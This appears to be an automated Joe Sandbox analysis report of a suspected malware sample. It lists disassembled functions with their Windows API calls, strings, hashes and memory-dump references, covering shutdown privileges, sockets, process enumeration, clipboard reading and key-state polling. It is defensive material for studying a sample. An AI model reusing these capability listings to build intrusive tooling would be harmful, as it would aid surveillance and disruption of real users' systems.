                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                          • String ID: NULL Pointer assignment
                                                                                          • API String ID: 1588287285-2785691316
                                                                                          • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                          • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                          • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                          • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                          Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                          • GetLastError.KERNEL32 ref: 00436504
                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                          • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                          • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 2938487562-3733053543
                                                                                          • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                          • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                          • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                          • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                          Function 0043614F Relevance: 16.6, APIs: 11, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __swprintf.LIBCMT ref: 00436162
                                                                                          • __swprintf.LIBCMT ref: 00436176
                                                                                            • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                          • __wcsicoll.LIBCMT ref: 00436185
                                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                          • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                          • LockResource.KERNEL32(?), ref: 004361FD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                          • String ID:
                                                                                          • API String ID: 2406429042-0
                                                                                          • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                          • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                          • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                          • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                          Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                          • GetLastError.KERNEL32 ref: 0045D59D
                                                                                          • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                          • API String ID: 4194297153-14809454
                                                                                          • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                          • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                          • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                          • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                          Function 0047AD92 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                            • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                          • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • _wcslen.LIBCMT ref: 0047AE18
                                                                                          • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                          • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                          • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                                          • String ID: HH
                                                                                          • API String ID: 1915432386-2761332787
                                                                                          • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                          • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                          • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                          • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                          Function 0044ED9A Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 448COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DEFINE$`$h$h
                                                                                          • API String ID: 0-4194577831
                                                                                          • Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                          • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                          • Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                          • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                          Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                                          • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                          • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                                          • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                          • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$bindclosesocketsocket
                                                                                          • String ID:
                                                                                          • API String ID: 2609815416-0
                                                                                          • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                          • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                          • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                          • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                          Function 0043701F Relevance: 10.6, APIs: 7, Instructions: 76processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                          • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                          • __wsplitpath.LIBCMT ref: 004370A5
                                                                                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                          • _wcscat.LIBCMT ref: 004370BA
                                                                                          • __wcsicoll.LIBCMT ref: 004370C8
                                                                                          • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                          • String ID:
                                                                                          • API String ID: 2547909840-0
                                                                                          • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                          • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                          • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                          • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                          Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                          • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                          • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                          • String ID: *.*
                                                                                          • API String ID: 2693929171-438819550
                                                                                          • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                          • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                          • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                          • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                          Function 0046C5D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69clipboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(?), ref: 0046C635
                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                          • CloseClipboard.USER32 ref: 0046C65D
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                          • CloseClipboard.USER32 ref: 0046C692
                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                          • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                          • CloseClipboard.USER32 ref: 0046C866
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                          • String ID: HH
                                                                                          • API String ID: 589737431-2761332787
                                                                                          • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                          • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                                          • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                          • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                                          Function 00436431 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __wcsicoll.LIBCMT ref: 0043643C
                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                          • __wcsicoll.LIBCMT ref: 00436466
                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicollmouse_event
                                                                                          • String ID: DOWN
                                                                                          • API String ID: 1033544147-711622031
                                                                                          • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                          • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                          • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                          • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                          Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                          • String ID:
                                                                                          • API String ID: 4170576061-0
                                                                                          • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                          • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                          • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                          • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                          Function 00456354 Relevance: 7.6, APIs: 5, Instructions: 127keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                          • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                          • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                          • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3539004672-0
                                                                                          • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                          • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                          • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                          • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                          Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                          • IsWindowVisible.USER32 ref: 00477314
                                                                                          • IsWindowEnabled.USER32 ref: 00477324
                                                                                          • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                          • IsIconic.USER32 ref: 0047733F
                                                                                          • IsZoomed.USER32 ref: 0047734D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                          • String ID:
                                                                                          • API String ID: 292994002-0
                                                                                          • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                          • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                          • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                          • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                          Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75573220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                          • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
